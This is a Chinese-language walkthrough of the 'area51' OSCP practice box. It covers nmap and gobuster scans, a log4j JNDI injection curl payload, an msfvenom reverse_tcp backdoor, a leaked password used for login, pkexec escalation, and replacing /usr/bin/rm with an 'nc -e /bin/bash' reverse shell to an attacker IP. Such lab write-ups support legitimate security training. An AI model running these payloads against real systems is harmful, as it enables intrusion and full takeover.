OSCP 靶场
靶场介绍
area51 |
medium |
log4j2 利用、凭据收集、pkexec 提权、命令劫持、msf 提权 |
信息收集
主机发现
nmap -sn 192.168.1.0/24
端口扫描
└─$ nmap -sV -A -p- -Pn -T4 192.168.1.97
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-25 10:36 +06
Nmap scan report for 192.168.1.97
Host is up (0.0034s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 de:bf:2a:93:86:b8:b3:a3:13:5b:46:66:34:d6:dc:b1 (RSA)
| 256 a9:df:bb:71:90:6c:d1:2f:e7:48:97:2e:ad:7b:15:d3 (ECDSA)
|_ 256 78:75:83:1c:03:03:a1:92:4f:73:8e:f2:2d:23:d2:0e (ED25519)
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: FBI Access
8080/tcp open nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (application/json).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.90 seconds
目录扫描
┌──(kali㉿kali)-[~]
└─$ gobuster dir -w pte_tools/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.97 -x php,txt,html -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.97
[+] Method: GET
[+] Threads: 10
[+] Wordlist: pte_tools/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.97/.html (Status: 403) [Size: 277]
http://192.168.1.97/.php (Status: 403) [Size: 277]
http://192.168.1.97/video (Status: 301) [Size: 312] [--> http://192.168.1.97/video/]
http://192.168.1.97/index.html (Status: 200) [Size: 1131]
http://192.168.1.97/radar (Status: 301) [Size: 312] [--> http://192.168.1.97/radar/]
http://192.168.1.97/note.txt (Status: 200) [Size: 119]
http://192.168.1.97/moon (Status: 301) [Size: 311] [--> http://192.168.1.97/moon/]
http://192.168.1.97/.html (Status: 403) [Size: 277]
http://192.168.1.97/.php (Status: 403) [Size: 277]
http://192.168.1.97/server-status (Status: 403) [Size: 277]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================
这里提示让我们检查log4j 漏洞,我们使用简单使用nc 和curl 请求发现存在该漏洞
curl http://192.168.1.97:8080 -H 'X-Api-Version: ${jndi:ldap://192.168.1.76:9001/test}'
nc -lvvp 9001
或者使用如下脚本进行内网扫描
https://github.com/Y0-kan/Log4jShell-Scan
权限获取
这里使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 工具进行注入,但是搞了半天还是失败了。
更换exp 反弹shell 成功,脚本如下:
https://github.com/kozmer/log4j-shell-poc
curl 'http://192.168.1.97:8080' -H 'X-Api-Version: ${jndi:ldap://192.168.1.76:1389/a}'
执行如下命令可以发现是docker 环境,因此我们还需要进行docker 逃逸
ls -alh /.dockerenv
-rwxr-xr-x 1 root root 0 Dec 19 2021 /.dockerenv
权限提升
php -S 0.0.0.0:123
使用linpeas.sh 扫描,发现存在隐藏文件,打开发现是宿主机的账号密码
cat /var/tmp/.roger
b3st4l13n
登录后成功获取flag
find / -perm -u=s -type f 2>/dev/null
roger@area51:~$ /usr/bin/pkexec --version
pkexec version 0.105
直接使用msf 的提权模块进行提权
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.76 LPORT=1234 -f elf > backdoor
提权方法二:
通过linpea.sh 脚本发现/etc/pam.d/kang 存在密码,拿到密码后直接登录成功。
在kang 家目录下发现存在一个奇怪的脚本,一会有一会没有,我们cat * 还可以执行输出 echo hi
猜测脚本内肯定执行了rm 命令,我们尝试使用替换命令反弹shell,成功获取root 权限。
echo 'nc -e /bin/bash 192.168.1.76 9001' > /usr/bin/rm
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP-Medium】area51
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论